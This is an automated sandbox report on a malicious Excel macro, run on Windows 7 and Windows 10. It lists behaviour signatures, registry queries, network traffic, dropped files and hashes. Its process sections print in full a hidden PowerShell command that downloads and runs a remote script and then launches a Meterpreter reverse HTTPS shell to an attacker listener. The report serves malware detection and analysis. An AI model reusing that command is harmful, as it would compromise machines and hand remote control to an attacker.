Malware Analysis Report

2025-01-22 19:14

Sample ID 240721-1enataxhqm
Target ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c
SHA256 ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c

Threat Level: Known bad

The file ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 21:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 21:33

Reported

2024-07-21 21:35

Platform

win7-20240704-en

Max time kernel

26s

Max time network

19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\wscript.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

C:\Windows\SysWOW64\wscript.exe

wscript C:\Users\Public\config.vbs

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp

Files

memory/2684-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2684-1-0x0000000071DDD000-0x0000000071DE8000-memory.dmp

memory/2684-3-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-2-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-4-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-13-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-18-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-6-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-5-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-27-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-32-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-37-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-38-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-19-0x0000000000590000-0x0000000000690000-memory.dmp

C:\Users\Public\config.vbs

MD5 ce52ab154163c511f0efa6a61e22ab64
SHA1 9f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256 df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512 cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

memory/2528-45-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/2528-44-0x000000001B300000-0x000000001B5E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B4068X96BB8520C6HQ2.temp

MD5 28716fb64b51e2ada2c528f0043f2e75
SHA1 2eb7af6edc1291ab9dbceb64d55c34e5c72336cf
SHA256 f6d5b360a949e10c606cdda941b2056db8b0b27137e7634f61149f28a799e6cc
SHA512 14933f5d0a3612133a1f9f105e9b223ef07807b6cfeddc66abac47f3605f1e831af7880b906e967e6436ebcc3c8c0a6786c39dcefbac7fed49e9c7efc5fb8cd7

memory/2684-48-0x0000000071DDD000-0x0000000071DE8000-memory.dmp

memory/2684-49-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-50-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2684-51-0x0000000000590000-0x0000000000690000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-21 21:33

Reported

2024-07-21 21:35

Platform

win10v2004-20240709-en

Max time kernel

46s

Max time network

39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\wscript.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\wscript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ba61d36c455000f52f3c5e117f7394a7a265fa77966d8c60a5f4f3aba6aae98c.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

C:\Windows\SYSTEM32\wscript.exe

wscript C:\Users\Public\config.vbs

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp

Files

memory/1624-0-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-1-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-2-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-3-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-4-0x00007FFE01CB0000-0x00007FFE01CC0000-memory.dmp

memory/1624-5-0x00007FFE41CCD000-0x00007FFE41CCE000-memory.dmp

memory/1624-9-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-8-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-7-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-6-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-10-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-11-0x00007FFDFF4E0000-0x00007FFDFF4F0000-memory.dmp

memory/1624-13-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-12-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-14-0x00007FFDFF4E0000-0x00007FFDFF4F0000-memory.dmp

memory/1624-15-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-20-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-17-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-16-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-21-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-23-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-22-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-19-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-18-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-31-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-32-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-42-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-44-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-43-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

C:\Users\Public\config.vbs

MD5 ce52ab154163c511f0efa6a61e22ab64
SHA1 9f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256 df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512 cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0weujvqw.afp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-55-0x00000265C7A90000-0x00000265C7AB2000-memory.dmp

memory/4372-68-0x00000265C7B10000-0x00000265C7B54000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 61a6ee65a0551d6bd2d8cfc42fe15f5a
SHA1 b32563f29c4a8cee0941d6f53498cb42ebdb3c51
SHA256 0c813cf51f2ff57c6f29292e2f60228b1957a18073b1c56d188669f72f0d3b39
SHA512 43e439c7211a94c9daf69c682b4c053210e99f8c0ccc5d5782bf003f6907f8b8b24b73f45bcbac82ecfc79d65b4371f06b662a15899bff8411742ff91a9879c2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/1624-77-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp

memory/1624-78-0x00007FFE41C30000-0x00007FFE41E25000-memory.dmp